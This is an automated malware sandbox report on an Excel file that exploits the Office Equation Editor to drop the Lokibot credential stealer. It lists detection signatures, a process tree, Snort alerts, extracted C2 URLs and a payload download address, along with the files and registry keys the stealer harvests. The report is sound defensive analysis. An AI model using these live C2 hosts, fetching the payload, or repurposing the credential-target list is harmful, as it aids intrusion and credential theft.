Windows Analysis Report
_2201S_BUSAN_HOCHIMINH_.xlsx

Overview

General Information

Sample Name:_2201S_BUSAN_HOCHIMINH_.xlsx
Analysis ID:569962
MD5:cf8b307caa943326ee808bb3cb02deee
SHA1:705c25adbdb7b805e47566540b3804eba178e7da
SHA256:cbe84e2c523fd51dabb1365df50415ffc51f8159c36798061742f08ba5d31b9b
Tags: Loki, VelvetSweatshop, xlsx

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected Lokibot
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Searches the installation path of Mozilla Firefox
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2984 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1712 cmdline: "C:\Users\Public\vbc.exe" MD5: 7DF1896047D9647D818080DD17563D92)
      • xmtxpy.exe (PID: 2260 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
        • xmtxpy.exe (PID: 2556 cmdline: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd MD5: 1EACD504E4461F9EE286715997D8A9EE)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source | Rule | Description | Author | Strings
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Loki_1 | Loki Payload | kevoreilly |
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
Source | Rule | Description | Author | Strings
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
6.2.xmtxpy.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
6.2.xmtxpy.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifcats observed in infostealers | ditekSHen |
  • 0x17936:$f1: FileZilla\recentservers.xml
  • 0x17976:$f2: FileZilla\sitemanager.xml
  • 0x15be6:$b2: Mozilla\Firefox\Profiles
  • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x15afa:$s4: logins.json
  • 0x169a4:$s6: wand.dat
  • 0x15424:$a1: username_value
  • 0x15414:$a2: password_value
  • 0x15a5f:$a3: encryptedUsername
  • 0x15acc:$a3: encryptedUsername
  • 0x15a72:$a4: encryptedPassword
  • 0x15ae0:$a4: encryptedPassword
6.2.xmtxpy.exe.400000.0.raw.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version

              Exploits

              Source: Network Connection, Author: Joe Security, Data: DestinationIp: 198.46.132.195, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2984, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

              System Summary

              Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2984, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 1712
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

              AV Detection

              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
              Source: _2201S_BUSAN_HOCHIMINH_.xlsx, Virustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsx, ReversingLabs: Detection: 32%
              Source: http://198.46.132.195/windowSSH/.win32.exe, Avira URL Cloud: Label: malware
              Source: http://asiaoil.bar//bobby/five/fre.php, Avira URL Cloud: Label: malware
              Source: http://198.46.132.195/windowSSH/.win32.exe, Virustotal: Detection: 7%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, Virustotal: Detection: 21%
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, ReversingLabs: Detection: 23%
              Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe, Joe Sandbox ML: detected

              Exploits

              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
              Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00405D7C FindFirstFileA,FindClose,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\Public\vbc.exe, Code function: 4_2_00402630 FindFirstFileA,
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe, Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: global traffic, DNS query: name: asiaoil.bar
              Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 198.46.132.195:80
              Source: excel.exe, Memory has grown: Private usage: 5MB later: 61MB

              Networking

              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49166 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49167 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 104.21.49.244:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49195 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49196 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49197 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49198 -> 172.67.197.66:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49198 -> 172.67.197.66:80
